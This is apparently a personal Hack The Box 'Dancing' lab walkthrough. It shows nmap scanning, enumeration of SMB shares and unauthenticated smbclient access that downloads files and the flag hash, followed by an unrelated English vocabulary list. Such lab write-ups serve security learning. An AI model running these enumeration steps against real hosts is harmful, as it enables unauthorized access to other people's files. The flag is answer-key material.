HTB-Dancing

SMB = Server Message Block

ubuntu@ip:~$ nmap -sV 10.129.166.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-01 10:00 UTC
Nmap scan report for ip-10-129-166-135.us-west-1.compute.internal (10.129.166.135)
Host is up (0.076s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.26 seconds

ubuntu@ip:~$ smbclient -L 10.129.166.135
Password for [WORKGROUP\ubuntu]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
SMB1 disabled -- no workgroup available

ubuntu@ip:~$ smbclient \\\\10.129.166.135\\WorkShares
Password for [WORKGROUP\ubuntu]:
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!

smb: \> ls
. D 0 Mon Mar 29 08:22:01 2021
.. D 0 Mon Mar 29 08:22:01 2021
Amy.J D 0 Mon Mar 29 09:08:24 2021
James.P D 0 Thu Jun 3 08:38:03 2021

5114111 blocks of size 4096. 1752067 blocks available

smb: \> cd Amy.J\
smb: \Amy.J\> ls
. D 0 Mon Mar 29 09:08:24 2021
.. D 0 Mon Mar 29 09:08:24 2021
worknotes.txt A 94 Fri Mar 26 11:00:37 2021

5114111 blocks of size 4096. 1752067 blocks available

smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

smb: \Amy.J\> cd ..

smb: \> ls
. D 0 Mon Mar 29 08:22:01 2021
.. D 0 Mon Mar 29 08:22:01 2021
Amy.J D 0 Mon Mar 29 09:08:24 2021
James.P D 0 Thu Jun 3 08:38:03 2021

5114111 blocks of size 4096. 1752067 blocks available

smb: \> cd James.P\

smb: \James.P\> ls
. D 0 Thu Jun 3 08:38:03 2021
.. D 0 Thu Jun 3 08:38:03 2021
flag.txt A 32 Mon Mar 29 09:26:57 2021

5114111 blocks of size 4096. 1752051 blocks available

smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)

smb: \James.P\> exit

ubuntu@ip:~$ ls
flag.txt lab_KILLMEN.ovpn lab_KILLMEN1.ovpn snap starting_point_KILLMEN.ovpn worknotes.txt

ubuntu@ip:~$ cat worknotes.txt
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing ubuntu@ip-172-31-17-119:~$

ubuntu@ip:~$ cat flag.txt
5f61c10dffbc77a704d76016a22f1664

Level 3 Pwned!

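One of these: one of them; one among them
serial ports: ports for serial communication
reserved for: set aside for
authentication n. verification; identification; identity verification
Hypothetically: supposedly; by assumption; in an imagined case
alongside prep. together with; beside; at the same time as; along adv. beside; side by side with; at the side of
tactic n. tactics; strategy; means; art of war; move adj. arranged, sequential; (chemistry) stereoregular; (biology) exhibiting taxis
prone adj. lying face down; liable to suffer; susceptible to; inclined to do; having a tendency to do (something bad)
directories n. directories (of computer files or programs); registers; telephone books; company listings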